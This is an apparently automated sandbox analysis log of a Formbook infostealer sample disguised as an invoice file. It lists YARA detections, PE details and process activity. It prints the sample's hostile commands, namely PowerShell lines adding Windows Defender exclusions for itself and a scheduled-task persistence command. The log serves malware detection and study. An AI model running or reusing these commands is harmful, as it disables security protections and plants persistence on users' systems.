          Source: 10.2.HAWB AND INV.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 10.2.HAWB AND INV.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.HAWB AND INV.exe.3d81880.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.HAWB AND INV.exe.3d81880.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: HAWB AND INV.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: qxnptkmQbHB.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@16/19@9/4
          Source: C:\Users\user\Desktop\HAWB AND INV.exeFile created: C:\Users\user\AppData\Roaming\qxnptkmQbHB.exeJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6948:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4756:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7064:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7080:120:WilError_01
          Source: C:\Users\user\Desktop\HAWB AND INV.exeFile created: C:\Users\user\AppData\Local\Temp\tmp9D41.tmpJump to behavior
          Source: HAWB AND INV.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\HAWB AND INV.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\HAWB AND INV.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE id=@id;
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
          Source: HAWB AND INV.exeReversingLabs: Detection: 21%
          Source: C:\Users\user\Desktop\HAWB AND INV.exeFile read: C:\Users\user\Desktop\HAWB AND INV.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\HAWB AND INV.exe 'C:\Users\user\Desktop\HAWB AND INV.exe'
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HAWB AND INV.exe'
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe'
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\qxnptkmQbHB' /XML 'C:\Users\user\AppData\Local\Temp\tmp9D41.tmp'
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe'
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess created: C:\Users\user\Desktop\HAWB AND INV.exe C:\Users\user\Desktop\HAWB AND INV.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HAWB AND INV.exe'
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe'
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\qxnptkmQbHB' /XML 'C:\Users\user\AppData\Local\Temp\tmp9D41.tmp'
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe'
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess created: C:\Users\user\Desktop\HAWB AND INV.exe C:\Users\user\Desktop\HAWB AND INV.exe
          Source: C:\Users\user\Desktop\HAWB AND INV.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
          Source: C:\Users\user\Desktop\HAWB AND INV.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: HAWB AND INV.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: HAWB AND INV.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: ipconfig.pdb source: HAWB AND INV.exe, 0000000A.00000002.485361222.0000000003100000.00000040.00000001.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: HAWB AND INV.exe, 0000000A.00000002.485361222.0000000003100000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000B.00000000.426929861.000000000DC20000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: HAWB AND INV.exe, 0000000A.00000002.479054770.00000000012CF000.00000040.00000001.sdmp, ipconfig.exe, 00000017.00000003.473141653.00000000008F0000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: HAWB AND INV.exe, ipconfig.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 0000000B.00000000.426929861.000000000DC20000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 0_2_009794E5 push cs; iretd
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 0_2_05838AB8 pushad ; ret
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 0_2_05838AC2 pushad ; ret
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0041B3B5 push eax; ret
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0041B46C push eax; ret
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0041B402 push eax; ret
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0041B40B push eax; ret
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0041B584 push edi; ret
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_00415611 pushfd ; iretd
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_00415EB3 push edx; retf
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_00415FB3 push esi; ret
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_007594E5 push cs; iretd
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0122D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B2D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_0012B3B5 push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_0012B402 push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_0012B40B push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_0012B46C push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_0012B584 push edi; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_00125611 pushfd ; iretd
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_00125EB3 push edx; retf
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_00125FB3 push esi; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.93407065965
          Source: initial sampleStatic PE information: section name: .text entropy: 7.93407065965

          Persistence and Installation Behavior:

          barindex
          Uses ipconfig to lookup or modify the Windows network settingsShow sources
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Users\user\Desktop\HAWB AND INV.exeFile created: C:\Users\user\AppData\Roaming\qxnptkmQbHB.exeJump to dropped file

          Boot Survival:

          barindex
          Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\qxnptkmQbHB' /XML 'C:\Users\user\AppData\Local\Temp\tmp9D41.tmp'
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
